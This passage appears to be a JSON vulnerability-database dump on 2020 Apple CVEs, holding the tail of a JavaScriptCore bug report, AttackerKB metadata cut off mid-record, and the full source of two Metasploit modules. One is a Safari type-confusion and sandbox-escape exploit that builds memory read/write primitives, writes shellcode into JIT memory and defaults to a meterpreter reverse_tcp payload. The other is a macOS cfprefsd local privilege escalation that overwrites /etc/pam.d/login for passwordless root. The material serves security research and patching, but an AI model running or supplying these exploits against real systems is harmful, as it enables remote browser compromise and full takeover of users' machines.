(code=1, address=0x1c1fc61348) \nframe #0: 0x000051fcfaa06f2e \n-> 0x51fcfaa06f2e: movsd xmm0, qword ptr [rax + 8*rcx] ; xmm0 = mem[0],zero \n0x51fcfaa06f33: ucomisd xmm0, xmm0 \n0x51fcfaa06f37: jp 0x51fcfaa0707f \n0x51fcfaa06f3d: movq rax, xmm0 \nTarget 0: (jsc) stopped. \n(lldb) reg read rcx \nrcx = 0x0000000080000000 \n*/ \n \nThe main trick here is to use an additional if conditional to trick the IntegerRangeOptimization into removing a CheckBounds node as it (correctly) believes that the result of ArithAbs must be a positive integer. However, due to the incorrect CSE, the result of ArithAbs will actually be INT_MIN in the last iteration, thus causing an out-of-bounds access. It is probably also possible to modify the code in such a way that the out-of-bounds access happens with an index other than INT_MIN. \n \nNote that the above PoC does not always crash as JSC seems to allocate huge memory regions, causing the OOB array access to sometimes still land in mapped memory. \n \nIt is probably worth checking other operations for similar bugs in DFGClobberize. For example, ArithAbs looks like it might suffer from a very similar bug. \n \nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse, \nthe bug report will become visible to the public. The scheduled disclosure \ndate is 2020-06-03. Disclosure at an earlier date is also possible if \nagreed upon by all parties. \n \n[1] https://github.com/WebKit/webkit/blob/2aabe9466e5be21468dcf84092e2ddff0d4e17a7/Source/JavaScriptCore/dfg/DFGCSEPhase.cpp \n[2] https://github.com/WebKit/webkit/blob/2aabe9466e5be21468dcf84092e2ddff0d4e17a7/Source/JavaScriptCore/dfg/DFGClobberize.h#L391 \n[3] https://github.com/WebKit/webkit/blob/2aabe9466e5be21468dcf84092e2ddff0d4e17a7/Source/JavaScriptCore/dfg/DFGClobberize.h#L1252 \n[4] https://github.com/WebKit/webkit/blob/2aabe9466e5be21468dcf84092e2ddff0d4e17a7/Source/JavaScriptCore/dfg/DFGClobberize.h#L247 \n[5] https://github.com/WebKit/webkit/blob/2aabe9466e5be21468dcf84092e2ddff0d4e17a7/Source/JavaScriptCore/dfg/DFGSpeculativeJIT.cpp#L4653 \n[6] https://github.com/WebKit/webkit/blob/2aabe9466e5be21468dcf84092e2ddff0d4e17a7/Source/JavaScriptCore/dfg/DFGFixupPhase.cpp#L392 \n[7] https://github.com/WebKit/webkit/blob/2aabe9466e5be21468dcf84092e2ddff0d4e17a7/Source/JavaScriptCore/dfg/DFGIntegerRangeOptimizationPhase.cpp#L1124 \n[8] https://github.com/WebKit/webkit/blob/2aabe9466e5be21468dcf84092e2ddff0d4e17a7/Source/JavaScriptCore/dfg/DFGIntegerRangeOptimizationPhase.cpp#L1389 \n[9] https://github.com/WebKit/webkit/blob/2aabe9466e5be21468dcf84092e2ddff0d4e17a7/Source/JavaScriptCore/dfg/DFGIntegerRangeOptimizationPhase.cpp#L1240 \n \nRelated CVE Numbers: CVE-2020-9802Fixed-2020-May-20. \n \n \n \nFound by: saelo@google.com \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/157926/GS20200603161426.txt"}, {"lastseen": "2020-10-01T15:29:21", "description": "", "cvss3": {}, "published": "2020-10-01T00:00:00", "type": "packetstorm", "title": "Safari Type Confusion / Sandbox Escape", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-9801", "CVE-2020-9850", "CVE-2020-9856"], "modified": "2020-10-01T00:00:00", "id": "PACKETSTORM:159447", "href": "https://packetstormsecurity.com/files/159447/Safari-Type-Confusion-Sandbox-Escape.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ManualRanking \n \ninclude Msf::Post::File \ninclude Msf::Exploit::Remote::HttpServer \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Safari in Operator Side Effect Exploit', \n'Description' => %q{ \nThis module exploits an incorrect side-effect modeling of the 'in' operator. \nThe DFG compiler assumes that the 'in' operator is side-effect free, however \nthe <embed> element with the PDF plugin provides a callback that can trigger \nside-effects leading to type confusion (CVE-2020-9850). \nThe type confusion can be used as addrof and fakeobj primitives that then \nlead to arbitrary read/write of memory. These primitives allow us to write \nshellcode into a JIT region (RWX memory) containing the next stage of the \nexploit. \nThe next stage uses CVE-2020-9856 to exploit a heap overflow in CVM Server, \nand extracts a macOS application containing our payload into /var/db/CVMS. \nThe payload can then be opened with CVE-2020-9801, executing the payload \nas a user but without sandbox restrictions. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Yonghwi Jin <jinmoteam[at]gmail.com>', # pwn2own2020 \n'Jungwon Lim <setuid0[at]protonmail.com>', # pwn2own2020 \n'Insu Yun <insu[at]gatech.edu>', # pwn2own2020 \n'Taesoo Kim <taesoo[at]gatech.edu>', # pwn2own2020 \n'timwr' # metasploit integration \n], \n'References' => [ \n['CVE', '2020-9801'], \n['CVE', '2020-9850'], \n['CVE', '2020-9856'], \n['URL', 'https://github.com/sslab-gatech/pwn2own2020'], \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { 'WfsDelay' => 300, 'PAYLOAD' => 'osx/x64/meterpreter/reverse_tcp' }, \n'Targets' => [ \n[ 'Mac OS X x64 (Native Payload)', { 'Arch' => ARCH_X64, 'Platform' => [ 'osx' ] } ], \n[ 'Python payload', { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ], \n[ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ], \n], \n'DisclosureDate' => 'Mar 18 2020' \n) \n) \nregister_advanced_options([ \nOptBool.new('DEBUG_EXPLOIT', [false, 'Show debug information in the exploit javascript', false]), \n]) \nend \n \ndef exploit_js \n<<~JS \nconst DUMMY_MODE = 0; \nconst ADDRESSOF_MODE = 1; \nconst FAKEOBJ_MODE = 2; \n \nfunction pwn() { \nlet otherWindow = document.getElementById('frame').contentWindow; \nlet innerDiv = otherWindow.document.querySelector('div'); \n \nif (!innerDiv) { \nprint(\"Failed to get innerDiv\"); \nreturn; \n} \n \nlet embed = otherWindow.document.querySelector('embed'); \n \notherWindow.document.body.removeChild(embed); \notherWindow.document.body.removeChild(otherWindow.annotationContainer); \n \nconst origFakeObjArr = [1.1, 1.1]; \nconst origAddrOfArr = [2.2, 2.2]; \nlet fakeObjArr = Array.from(origFakeObjArr); \nlet addressOfArr = Array.from(origAddrOfArr); \nlet addressOfTarget = {}; \n \nlet sideEffectMode = DUMMY_MODE; \notherWindow.document.body.addEventListener('DOMSubtreeModified', () => { \nif (sideEffectMode == DUMMY_MODE) \nreturn; \nelse if (sideEffectMode == FAKEOBJ_MODE) \nfakeObjArr[0] = {}; \nelse if (sideEffectMode == ADDRESSOF_MODE) \naddressOfArr[0] = addressOfTarget; \n}); \n \nprint('Callback is registered'); \n \notherWindow.document.body.appendChild(embed); \nlet triggerArr; \n \nfunction optFakeObj(triggerArr, arr, addr) { \narr[1] = 5.5; \nlet tmp = 0 in triggerArr; \narr[0] = addr; \nreturn tmp; \n} \n \nfunction optAddrOf(triggerArr, arr) { \narr[1] = 6.6; \nlet tmp = 0 in triggerArr; \nreturn [arr[0], tmp]; \n} \n \nfunction prepare() { \ntriggerArr = [7.7, 8.8]; \ntriggerArr.__proto__ = embed; \nsideEffectMode = DUMMY_MODE; \nfor (var i = 0; i < 1e5; i++) { \noptFakeObj(triggerArr, fakeObjArr, 9.9); \noptAddrOf(triggerArr, addressOfArr); \n} \ndelete triggerArr[0]; \n} \n \nfunction cleanup() { \notherWindow.document.body.removeChild(embed); \notherWindow.document.body.appendChild(embed); \n \nif (sideEffectMode == FAKEOBJ_MODE) \nfakeObjArr = Array.from(origFakeObjArr); \nelse if (sideEffectMode == ADDRESSOF_MODE) \naddressOfArr = Array.from(origAddrOfArr); \n \nsideEffectMode = DUMMY_MODE; \n} \n \nfunction addressOf(obj) { \naddressOfTarget = obj; \nsideEffectMode = ADDRESSOF_MODE; \nlet ret = optAddrOf(triggerArr, addressOfArr)[0]; \ncleanup(); \nreturn Int64.fromDouble(ret); \n} \n \nfunction fakeObj(addr) { \nsideEffectMode = FAKEOBJ_MODE; \noptFakeObj(triggerArr, fakeObjArr, addr.asDouble()); \nlet ret = fakeObjArr[0]; \ncleanup(); \nreturn ret; \n} \n \nprepare(); \nprint(\"Prepare is done\"); \n \nlet hostObj = { \n_: 1.1, \nlength: (new Int64('0x4141414141414141')).asDouble(), \nid: new Int64([ \n0, 0, 0, 0, // m_structureID \n0x17, // m_indexingType \n0x19, // m_type \n0x08, // m_flags \n0x1 // m_cellState \n]).asJSValue(), \nbutterfly: 0, \no:1, \nexecutable:{ \na:1, b:2, c:3, d:4, e:5, f:6, g:7, h:8, i:9, // Padding (offset: 0x58) \nunlinkedExecutable:{ \nisBuiltinFunction: 1 << 31, \nb:0, c:0, d:0, e:0, f:0, g:0, // Padding (offset: 0x48) \nidentifier: null \n} \n}, \nstrlen_or_id: (new Int64('0x10')).asDouble(), \ntarget: null \n} \n \n// Structure ID leak of hostObj.target \nhostObj.target=hostObj \n \nvar hostObjRawAddr = addressOf(hostObj); \nvar hostObjBufferAddr = Add(hostObjRawAddr, 0x20) \nvar fakeHostObj = fakeObj(hostObjBufferAddr); \nvar fakeIdentifier = fakeObj(Add(hostObjRawAddr, 0x40)); \n \nhostObj.executable.unlinkedExecutable.identifier=fakeIdentifier \nlet rawStructureId=Function.prototype.toString.apply(fakeHostObj) \n \nlet leakStructureId=Add(new Int64( \nrawStructureId[9].charCodeAt(0)+rawStructureId[10].charCodeAt(0)*0x10000 \n), new Int64([ \n0, 0, 0, 0, // m_structureID \n0x07, // m_indexingType \n0x22, // m_type \n0x06, // m_flags \n0x1 // m_cellState \n])) \nprint('Leaked structure ID: ' + leakStructureId); \n \nhostObj.strlen_or_id = hostObj.id = leakStructureId.asDouble(); \nhostObj.butterfly = fakeHostObj; \n \naddressOf = function(obj) { \nhostObj.o = obj; \nreturn Int64.fromDouble(fakeHostObj[2]); \n} \n \nfakeObj = function(addr) { \nfakeHostObj[2] = addr.asDouble(); \nreturn hostObj.o; \n} \n \nprint('Got reliable addressOf/fakeObj'); \n \nlet rwObj = { \n_: 1.1, \nlength: (new Int64('0x4141414141414141')).asDouble(), \nid: leakStructureId.asDouble(), \nbutterfly: 1.1, \n \n__: 1.1, \ninnerLength: (new Int64('0x4141414141414141')).asDouble(), \ninnerId: leakStructureId.asDouble(), \ninnerButterfly: 1.1, \n} \n \nvar rwObjBufferAddr = Add(addressOf(rwObj), 0x20); \nvar fakeRwObj = fakeObj(rwObjBufferAddr); \nrwObj.butterfly = fakeRwObj; \n \nvar fakeInnerObj = fakeObj(Add(rwObjBufferAddr, 0x20)); \nrwObj.innerButterfly = fakeInnerObj; \n \n \nfunction read64(addr) { \n// We use butterfly and it depends on its size in -1 index \n// Thus, we keep searching non-zero value to read value \nfor (var i = 0; i < 0x1000; i++) { \nfakeRwObj[5] = Sub(addr, -8 * i).asDouble(); \nlet value = fakeInnerObj[i]; \nif (value) { \nreturn Int64.fromDouble(value); \n} \n} \nthrow 'Failed to read: ' + addr; \n} \n \nfunction write64(addr, value) { \nfakeRwObj[5] = addr.asDouble(); \nfakeInnerObj[0] = value.asDouble(); \n} \n \nfunction makeJITCompiledFunction() { \nvar obj = {}; \n// Some code to avoid inlining... \nfunction target(num) { \nnum ^= Math.random() * 10000; \nnum ^= 0x70000001; \nnum ^= Math.random() * 10000; \nnum ^= 0x70000002; \nnum ^= Math.random() * 10000; \nnum ^= 0x70000003; \nnum ^= Math.random() * 10000; \nnum ^= 0x70000004; \nnum ^= Math.random() * 10000; \nnum ^= 0x70000005; \nnum ^= Math.random() * 10000; \nnum ^= 0x70000006; \nnum ^= Math.random() * 10000; \nnum ^= 0x70000007; \nnum ^= Math.random() * 10000; \nnum ^= 0x70000008; \nnum ^= Math.random() * 10000; \nnum ^= 0x70000009; \nnum ^= Math.random() * 10000; \nnum ^= 0x7000000a; \nnum ^= Math.random() * 10000; \nnum ^= 0x7000000b; \nnum ^= Math.random() * 10000; \nnum ^= 0x7000000c; \nnum ^= Math.random() * 10000; \nnum ^= 0x7000000d; \nnum ^= Math.random() * 10000; \nnum ^= 0x7000000e; \nnum ^= Math.random() * 10000; \nnum ^= 0x7000000f; \nnum ^= Math.random() * 10000; \nnum ^= 0x70000010; \nnum ^= Math.random() * 10000; \nnum ^= 0x70000011; \nnum ^= Math.random() * 10000; \nnum ^= 0x70000012; \nnum ^= Math.random() * 10000; \nnum ^= 0x70000013; \nnum ^= Math.random() * 10000; \nnum ^= 0x70000014; \nnum ^= Math.random() * 10000; \nnum ^= 0x70000015; \nnum ^= Math.random() * 10000; \nnum ^= 0x70000016; \nnum ^= Math.random() * 10000; \nnum ^= 0x70000017; \nnum ^= Math.random() * 10000; \nnum ^= 0x70000018; \nnum ^= Math.random() * 10000; \nnum ^= 0x70000019; \nnum ^= Math.random() * 10000; \nnum ^= 0x7000001a; \nnum ^= Math.random() * 10000; \nnum ^= 0x7000001b; \nnum ^= Math.random() * 10000; \nnum ^= 0x7000001c; \nnum ^= Math.random() * 10000; \nnum ^= 0x7000001d; \nnum ^= Math.random() * 10000; \nnum ^= 0x7000001e; \nnum ^= Math.random() * 10000; \nnum ^= 0x7000001f; \nnum ^= Math.random() * 10000; \nnum ^= 0x70000020; \nnum ^= Math.random() * 10000; \nnum &= 0xffff; \nreturn num; \n} \n \n// Force JIT compilation. \nfor (var i = 0; i < 1000; i++) { \ntarget(i); \n} \nfor (var i = 0; i < 1000; i++) { \ntarget(i); \n} \nfor (var i = 0; i < 1000; i++) { \ntarget(i); \n} \nreturn target; \n} \n \nfunction getJITCodeAddr(func) { \nvar funcAddr = addressOf(func); \nprint(\"Target function @ \" + funcAddr.toString()); \nvar executableAddr = read64(Add(funcAddr, 3 * 8)); \nprint(\"Executable instance @ \" + executableAddr.toString()); \n \nvar jitCodeAddr = read64(Add(executableAddr, 3 * 8)); \nprint(\"JITCode instance @ \" + jitCodeAddr.toString()); \n \nif (And(jitCodeAddr, new Int64('0xFFFF800000000000')).toString() != '0x0000000000000000' || \nAnd(Sub(jitCodeAddr, new Int64('0x100000000')), new Int64('0x8000000000000000')).toString() != '0x0000000000000000') { \njitCodeAddr = Add(ShiftLeft(read64(Add(executableAddr, 3 * 8 + 1)), 1), 0x100); \nprint(\"approx. JITCode instance @ \" + jitCodeAddr.toString()); \n} \n \nreturn jitCodeAddr; \n} \n \nfunction setJITCodeAddr(func, addr) { \nvar funcAddr = addressOf(func); \nprint(\"Target function @ \" + funcAddr.toString()); \nvar executableAddr = read64(Add(funcAddr, 3 * 8)); \nprint(\"Executable instance @ \" + executableAddr.toString()); \nwrite64(Add(executableAddr, 3 * 8), addr); \n} \n \nfunction getJITFunction() { \nvar shellcodeFunc = makeJITCompiledFunction(); \nshellcodeFunc(); \nvar jitCodeAddr = getJITCodeAddr(shellcodeFunc); \nreturn [shellcodeFunc, jitCodeAddr]; \n} \n \nvar [_JITFunc, rwxMemAddr] = getJITFunction(); \n \nfor (var i = 0; i < stage0.length; i++) \nwrite64(Add(rwxMemAddr, i), new Int64(stage0[i])); \n \nsetJITCodeAddr(alert, rwxMemAddr); \nvar argv = { \na0: stage1Arr, \na1: stage2Arr, \ndoc: document, \na2: 0x41414141, \na3: 0x42424242, \na4: 0x43434343, \n}; \nalert(argv); \n} \n \nvar ready = new Promise(function(resolve) { \nif (typeof(window) === 'undefined') \nresolve(); \nelse \nwindow.onload = function() { \nresolve(); \n} \n}); \n \nready.then(function() { \ntry { \npwn() \n} catch (e) { \nprint(\"Exception caught: \" + e); \nlocation.reload(); \n} \n}).catch(function(err) { \nprint(\"Initializatin failed\"); \n}); \nJS \nend \n \ndef offset_table \n{ \n'placeholder' => { \njsc_confstr_stub: 0x0FF5370041414141, \njsc_llint_entry_call: 0x0FF5370041414142, \nlibsystem_c_confstr: 0x0FF5370041414143, \nlibsystem_c_dlopen: 0x0FF5370041414144, \nlibsystem_c_dlsym: 0x0FF5370041414145 \n}, \n'10.15.3' => { \njsc_confstr_stub: 0xE7D8B4, \njsc_llint_entry_call: 0x361f13, \nlibsystem_c_confstr: 0x2644, \nlibsystem_c_dlopen: 0x80430, \nlibsystem_c_dlsym: 0x80436 \n}, \n'10.15.4' => { \njsc_confstr_stub: 0xF96446, \njsc_llint_entry_call: 0x380a1d, \nlibsystem_c_confstr: 0x2be4, \nlibsystem_c_dlopen: 0x8021e, \nlibsystem_c_dlsym: 0x80224 \n} \n} \nend \n \ndef get_offsets(user_agent) \nif user_agent =~ /Intel Mac OS X (.*?)\\)/ \nosx_version = Regexp.last_match(1).gsub('_', '.') \nif user_agent =~ %r{Version/(.*?) } \nif Gem::Version.new(Regexp.last_match(1)) > Gem::Version.new('13.1') \nprint_warning \"Safari version #{Regexp.last_match(1)} is not vulnerable\" \nreturn false \nelse \nprint_good \"Safari version #{Regexp.last_match(1)} appears to be vulnerable\" \nend \nend \nmac_osx_version = Gem::Version.new(osx_version) \nif mac_osx_version >= Gem::Version.new('10.15.5') \nprint_warning \"macOS version #{mac_osx_version} is not vulnerable\" \nelsif mac_osx_version < Gem::Version.new('10.14') \nprint_warning \"macOS version #{mac_osx_version} is not supported\" \nelsif offset_table.key?(osx_version) \nreturn offset_table[osx_version] \nelse \nprint_warning \"No offsets for version #{mac_osx_version}\" \nend \nelse \nprint_warning 'Unexpected User-Agent' \nend \nreturn false \nend \n \ndef on_request_uri(cli, request) \nif datastore['DEBUG_EXPLOIT'] && request.uri =~ %r{/print$*} \nprint_status(\"[*] #{request.body}\") \nsend_response(cli, '') \nreturn \nend \n \nuser_agent = request['User-Agent'] \nprint_status(\"Request #{request.uri} from #{user_agent}\") \nif request.uri.ends_with? '.pdf' \nsend_response(cli, '', { 'Content-Type' => 'application/pdf' }) \nreturn \nend \n \noffsets = get_offsets(user_agent) \nunless offsets \nsend_not_found(cli) \nreturn \nend \n \nutils = exploit_data 'javascript_utils', 'utils.js' \nint64 = exploit_data 'javascript_utils', 'int64.js' \nstage0 = exploit_data 'CVE-2020-9850', 'stage0.bin' \nstage1 = exploit_data 'CVE-2020-9850', 'loader.bin' \nstage2 = exploit_data 'CVE-2020-9850', 'sbx.bin' \n \noffset_table['placeholder'].each do |k, v| \nplaceholder_index = stage1.index([v].pack('Q')) \nstage1[placeholder_index, 8] = [offsets[k]].pack('Q') \nend \n \ncase target['Arch'] \nwhen ARCH_X64 \nroot_payload = payload.encoded \nwhen ARCH_PYTHON \nroot_payload = \"CMD:echo \\\"#{payload.encoded}\\\" | python\" \nwhen ARCH_CMD \nroot_payload = \"CMD:#{payload.encoded}\" \nend \nif root_payload.length > 1024 \nfail_with Failure::PayloadFailed, \"Payload size (#{root_payload.length}) exceeds space in payload placeholder\" \nend \nplaceholder_index = stage2.index('ROOT_PAYLOAD_PLACEHOLDER') \nstage2[placeholder_index, root_payload.length] = root_payload \npayload_js = <<~JS \nconst stage0 = [ \n#{Rex::Text.to_num(stage0)} \n]; \nvar stage1Arr = new Uint8Array([#{Rex::Text.to_num(stage1)}]); \nvar stage2Arr = new Uint8Array([#{Rex::Text.to_num(stage2)}]); \nJS \n \njscript = <<~JS \n#{utils} \n#{int64} \n#{payload_js} \n#{exploit_js} \nJS \n \nif datastore['DEBUG_EXPLOIT'] \ndebugjs = %^ \nprint = function(arg) { \nvar request = new XMLHttpRequest(); \nrequest.open(\"POST\", \"/print\", false); \nrequest.send(\"\" + arg); \n}; \n^ \njscript = \"#{debugjs}#{jscript}\" \nelse \njscript.gsub!(%r{//.*$}, '') # strip comments \njscript.gsub!(/^\\s*print\\s*\\(.*?\\);\\s*$/, '') # strip print(*); \nend \n \npdfpath = datastore['URIPATH'] || get_resource \npdfpath += '/' unless pdfpath.end_with? '/' \npdfpath += Rex::Text.rand_text_alpha(4..8) + '.pdf' \n \nhtml = <<~HTML \n<html> \n<head> \n<style> \nbody { \nmargin: 0; \n} \niframe { \ndisplay: none; \n} \n</style> \n</head> \n<body> \n<iframe id=frame width=10% height=10% src=\"#{pdfpath}\"></iframe> \n<script> \n#{jscript} \n</script> \n</body> \n</html> \nHTML \n \nsend_response(cli, html, { 'Content-Type' => 'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0' }) \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/159447/safari_in_operator_side_effect.rb.txt"}], "metasploit": [{"lastseen": "2022-11-03T06:47:43", "description": "This module exploits an arbitrary file write in cfprefsd on macOS <= 10.15.4 in order to run a payload as root. The CFPreferencesSetAppValue function, which is reachable from most unsandboxed processes, can be exploited with a race condition in order to overwrite an arbitrary file as root. By overwriting /etc/pam.d/login a user can then login as root with the `login root` command without a password.\n", "cvss3": {}, "published": "2020-08-18T07:56:01", "type": "metasploit", "title": "macOS cfprefsd Arbitrary File Write Local Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-9839"], "modified": "2021-09-08T21:59:25", "id": "MSF:EXPLOIT-OSX-LOCAL-CFPREFSD_RACE_CONDITION-", "href": "https://www.rapid7.com/db/modules/exploit/osx/local/cfprefsd_race_condition/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Post::File\n include Msf::Post::OSX::Priv\n include Msf::Post::OSX::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'macOS cfprefsd Arbitrary File Write Local Privilege Escalation',\n 'Description' => %q{\n This module exploits an arbitrary file write in cfprefsd on macOS <= 10.15.4 in\n order to run a payload as root. The CFPreferencesSetAppValue function, which is\n reachable from most unsandboxed processes, can be exploited with a race condition\n in order to overwrite an arbitrary file as root. By overwriting /etc/pam.d/login\n a user can then login as root with the `login root` command without a password.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Yonghwi Jin <jinmoteam[at]gmail.com>', # pwn2own2020\n 'Jungwon Lim <setuid0[at]protonmail.com>', # pwn2own2020\n 'Insu Yun <insu[at]gatech.edu>', # pwn2own2020\n 'Taesoo Kim <taesoo[at]gatech.edu>', # pwn2own2020\n 'timwr' # metasploit integration\n ],\n 'References' => [\n ['CVE', '2020-9839'],\n ['URL', 'https://github.com/sslab-gatech/pwn2own2020'],\n ],\n 'Platform' => 'osx',\n 'Arch' => ARCH_X64,\n 'DefaultTarget' => 0,\n 'DefaultOptions' => { 'WfsDelay' => 300, 'PAYLOAD' => 'osx/x64/meterpreter/reverse_tcp' },\n 'Targets' => [\n [ 'Mac OS X x64 (Native Payload)', {} ],\n ],\n 'DisclosureDate' => '2020-03-18',\n 'Notes' => {\n 'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES],\n 'Reliability' => [REPEATABLE_SESSION],\n 'Stability' => [CRASH_SAFE]\n },\n 'Compat' => {\n 'Meterpreter' => {\n 'Commands' => %w[\n stdapi_sys_process_execute\n ]\n }\n }\n )\n )\n register_advanced_options [\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])\n ]\n end\n\n # rubocop:disable Style/ClassVars\n @@target_file = '/etc/pam.d/login'\n @@original_content = %q{# login: auth account password session\nauth optional pam_krb5.so use_kcminit\nauth optional pam_ntlm.so try_first_pass\nauth optional pam_mount.so try_first_pass\nauth required pam_opendirectory.so try_first_pass\naccount required pam_nologin.so\naccount required pam_opendirectory.so\npassword required pam_opendirectory.so\nsession required pam_launchd.so\nsession required pam_uwtmp.so\nsession optional pam_mount.so\n}\n @@replacement_content = %q{# login: auth account password session\nauth optional pam_permit.so\nauth optional pam_permit.so\nauth optional pam_permit.so\nauth required pam_permit.so\naccount required pam_permit.so\naccount required pam_permit.so\npassword required pam_permit.so\nsession required pam_permit.so\nsession required pam_permit.so\nsession optional pam_permit.so\n}\n # rubocop:enable Style/ClassVars\n\n def check\n version = Rex::Version.new(get_system_version)\n if version > Rex::Version.new('10.15.4')\n CheckCode::Safe\n elsif version < Rex::Version.new('10.15')\n CheckCode::Safe\n else\n CheckCode::Appears\n end\n end\n\n def exploit\n if is_root?\n fail_with Failure::BadConfig, 'Session already has root privileges'\n end\n\n unless writable? datastore['WritableDir']\n fail_with Failure::BadConfig, \"#{datastore['WritableDir']} is not writable\"\n end\n\n payload_file = \"#{datastore['WritableDir']}/.#{rand_text_alphanumeric(5..10)}\"\n binary_payload = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)\n upload_and_chmodx payload_file, binary_payload\n register_file_for_cleanup payload_file\n\n current_content = read_file(@@target_file)\n @restore_content = current_content\n\n if current_content == @@replacement_content\n print_warning(\"The contents of #{@@target_file} was already replaced\")\n elsif current_content != @@original_content\n print_warning(\"The contents of #{@@target_file} did not match the expected contents\")\n @restore_content = nil\n end\n\n exploit_file = \"#{datastore['WritableDir']}/.#{rand_text_alphanumeric(5..10)}\"\n exploit_exe = exploit_data 'CVE-2020-9839', 'exploit'\n upload_and_chmodx exploit_file, exploit_exe\n register_file_for_cleanup exploit_file\n\n exploit_cmd = \"#{exploit_file} #{@@target_file}\"\n print_status(\"Executing exploit '#{exploit_cmd}'\")\n result = cmd_exec(exploit_cmd)\n print_status(\"Exploit result:\\n#{result}\")\n unless write_file(@@target_file, @@replacement_content)\n print_error(\"#{@@target_file} could not be written\")\n end\n\n login_cmd = \"echo '#{payload_file} & disown' | login root\"\n print_status(\"Running cmd:\\n#{login_cmd}\")\n result = cmd_exec(login_cmd)\n unless result.blank?\n print_status(\"Command output:\\n#{result}\")\n end\n end\n\n def new_session_cmd(session, cmd)\n if session.type.eql? 'meterpreter'\n session.sys.process.execute '/bin/bash', \"-c '#{cmd}'\"\n else\n session.shell_command_token cmd\n end\n end\n\n def on_new_session(session)\n return super unless @restore_content\n\n if write_file(@@target_file, @restore_content)\n new_session_cmd(session, \"chgrp wheel #{@@target_file}\")\n new_session_cmd(session, \"chown root #{@@target_file}\")\n new_session_cmd(session, \"chmod 644 #{@@target_file}\")\n print_good(\"#{@@target_file} was restored\")\n else\n print_error(\"#{@@target_file} could not be restored!\")\n end\n super\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/osx/local/cfprefsd_race_condition.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "attackerkb": [{"lastseen": "2023-10-18T16:36:27", "description": "An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 13.5 and iPadOS 13.5, iOS 12.4.7, watchOS 6.2.5. Processing a maliciously crafted mail message may lead to unexpected memory modification or application termination.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T00:00:00", "type": "attackerkb", "title": "CVE-2020-9818", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9818"], "modified": "2023-10-06T00:00:00", "id": "AKB:A25051FF-1873-416F-9BC1-2871081CF0D1", "href": "https://attackerkb.com/topics/0gWGVYDm1Y/cve-2020-9818", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-10-18T16:36:34", "description": "A memory consumption issue was addressed with improved memory handling. This issue is fixed in iOS 13.5 and iPadOS 13.5, iOS 12.4.7, watchOS 6.2.5, watchOS 5.3.7. Processing a maliciously crafted mail message may lead to heap corruption.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 4.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 1.4}, "published": "2020-06-09T00:00:00", "type": "attackerkb", "title": "CVE-2020-9819", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": 